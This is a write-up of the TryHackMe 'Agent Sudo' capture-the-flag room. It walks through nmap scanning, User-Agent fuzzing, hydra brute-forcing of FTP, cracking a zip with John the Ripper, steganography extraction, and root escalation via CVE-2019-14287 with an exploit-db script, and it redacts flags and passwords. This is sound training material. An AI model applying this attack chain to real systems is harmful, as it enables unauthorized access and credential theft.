Agent Sudo, so cute. Let’s Deploy and hack!
After deployed, I again set an enviroment TARGET for target box so it saves some memory of my mind.
$ export TARGET=10.10.10.177
Author note
#Deploy the machine
answer: No answer needed
Enumerate
#How many open ports?
answer: 3
As usual, nmap to kick off the show:
$ nmap -sV -sC $TARGET
#How you redirect yourself to a secret page?
answer: user-agent
Visit the site on the target IP land us on:
Dear agents,
Use your own codename as user-agent to access the site.
From,
Agent R
Up untill now I still have no idea what is my agent code name. Looking at the hint format xxxx-xxxxx, then I tried my luck. Bingo! Now I know I need to set the User-Agent header to some custom value in order I can get redirected.
#What is the agent name?
answer: Chris
I have tried using ffuf to look for 301,302 by fuzzing the header (-H), but no luck.
$ ffuf -c -t 64 -w $W_USER_AGENT -u http://$TARGET -H "User-agent: FUZZ" -mc 301,302
$W_USER_AGENT = user-agent-whatismybrowserdotcom-large.txt
Took a lot at the hint, gave us by using “user agent: C”: (typed in myself after select any of the choices)
and I got:
Attention chris,
Do you still remember our deal? Please tell agent J about the stuff ASAP. Also, change your god damn password, is weak!
From,
Agent R
Hash cracking and brute-force
#FTP password
answer: [NO SPOILER]
By looking at the message by Agent R, chris has a weak password. Let’s try to brute force it by hydra:
$ hydra -f -I -vV -t 64 -l chris -P $W_PASSWORD $TARGET ftp
$W_PASSWORD = rockyou.txt
Since we have the ftp credentials, let’s login and check it out!
$ ftp $TARGET
Then we found: To_agentJ.txt, cute-alien.jpg and cutie-png. Download them all shall we?
$ ftp> get To_agentJ.txt
$ ftp> get cute-alien.jpg
$ ftp> get cue.png
Let’s look at the text file:
Ok, looks like the images are fake. Password should be hidden in the images!
By using binwalk I can check the composition of the images:
$ binwalk cute-alien.jpg
$ binwalk cutie.png
Let’s extract (-e) it out:
$ binwalk -e cutie.png
After we extracted the data from the image, we got a new folder: _cutie.png.extracted and inside have zip file: 8702.zip. So, I unzip it with 7z:
$ 7z x 8702.zip
#Zip file password
answer: [NO SPOILER]
I knew it would not be easy. Let crack the zip! But before that I found out the zipped file is — To_agentR.txt! Same name to the 0-byte file when we extracted from the image. So I deleted away the 0-byte file.
By using John the Ripper, we can crack it easily. Before that need to get the hash from the zip:
$ zip2john 8702.zip > zip.hashes
Despite the error reporting. We still got out hash back. So now crack it with John and unzip one more time with password found:
$ john zip.hashes
$ 7z x 8702.zip
Let’s examine the extracted file:
$ cat To_agentR.txt
#steg password
answer: [NO SPOILER]
Looks like there are more password to crack.
Agent C,
We need to send the picture to ‘XXXXXXXX’ as soon as possible!
By,
Agent R
I suspect the password is another hashed text. So I ran them through MultiEncoder.com for ROT-13, no luck then base64, got it!
#Who is the other agent (in full name)? — James
I have been spending some times here. By having the password from the base64, I dont know where to use it on. To be honest with you, I took a peep at MrSeth6797 writeup and realize what meant by “send the picture” in the above message. It means extract the info from the other image (cute-alien.jpg).
$ steghide extract -sf cute-alien.jpg
#SSH password
answer: [NO SPOILER]
Hi james,
Glad you find this message. Your login password is XXXXXXXXXXXX
Don’t ask me why the password look cheesy, ask agent R who set this password for you.
Your buddy,
chris
The password is within the same message.
Capture the user flag
#What is the user flag?
answer: [NO SPOILER]
By login in with the username and password from the previous step. We have a shell!
$ ssh james@TARGET
Lets examine the user_flag.txt~
#What is the incident of the photo called?
answer: Roswell alien autopsy
Inside the folder also have another image file, so I downloaded it via scp:
$ scp james@$TARGET:/home/james/Alien_autospy.jpg ./
Found out the incident from google by using “alien autopsy” then it leads me to the news.
Privilege escalation
#CVE number for the escalation
answer: CVE-2019-14287
I tried to see what my current permission is given by:
$ sudo -l
I am still just a beginner. So i tried to search for “BASH” related CVE in cve.mitre.org
I have tried the first dozen CVEs, no luck. So I gave up on this. Another peep into the writeup, and led me to this. With the CVE given to me. I tried to search in exploit-db and downloaded the python file.
With the py file in my hand i uploaded it to the TARGET /tmp/ folder.
$ scp ./47502.py james@TARGET:/tmp
Then back to the TARGET shell, I run the file and got the root:
$ python3 47502.py
#What is the root flag?
answer: [NO SPOILER]
So the remaining drill as usual:
To Mr.hacker,
Congratulation on rooting this box. This box was designed for TryHackMe. Tips, always update your machine.
Your flag is
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXBy,
DesKel a.k.a Agent R
#(Bonus) Who is Agent R?
answer: Deskel